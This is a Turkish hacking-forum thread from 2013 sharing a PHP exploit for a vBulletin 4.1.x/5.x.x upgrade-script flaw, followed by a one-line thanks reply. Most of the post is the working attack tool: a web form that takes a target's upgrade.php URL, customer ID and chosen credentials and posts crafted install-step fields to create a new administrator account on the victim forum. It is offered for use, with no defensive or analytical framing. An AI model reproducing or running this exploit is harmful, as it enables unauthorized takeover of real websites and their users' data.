Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği > Hack Videoları


VBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

Hack Videoları

Yeni Konu aç Cevapla
 
Seçenekler
Alt 24-10-2013 12:04   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
root@server
Yaş
23
Mesajlar
Konular

Teşekkür (Etti): 968
Teşekkür (Aldı): 3104


VBulletin 4.1.x / 5.x.x Upgrade 0day Exploit



VBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit - YouTube

Videodaki php Kodlamaa

Kod:
<h1>vBulletin  4.1.x  /  5.x.x   Upgrade   0day  Exploit</h1>
<p>Created by: Boxhead</p>
<p>Found on: 08/22/2013</p>
<p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);

//set POST variables
$url = $_POST['url'];
$fields = array(
                        'ajax' => urlencode('1'),
                        'version' => urlencode('install'),
                        'checktable' => urlencode('false'),
                        'firstrun' => urlencode('false'),
                        'step' => urlencode('7'),
                        'startat' => urlencode('0'),
                        'only' => urlencode('false'),
                        'customerid' => urlencode($_POST['customerid']),
                        'options[skiptemplatemerge]' => urlencode('0'),
                        'response' => urlencode('yes'),
                        'htmlsubmit' => urlencode('1'),
                        'htmldata[username]' => urlencode($_POST['username']),
                        'htmldata[password]' => urlencode($_POST['password']),
                        'htmldata[confirmpassword]' => urlencode($_POST['password']),
                        'htmldata[email]' => urlencode($_POST['email'])
                );

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );

//execute post
$result = curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
  <span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />
    
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ByS3MTEXz Teşekkür etti.
Alt 26-02-2016 10:02   #2
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
01/2016
Mesajlar
Konular
8

Teşekkür (Etti): 0
Teşekkür (Aldı): 4




Saol üstad
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau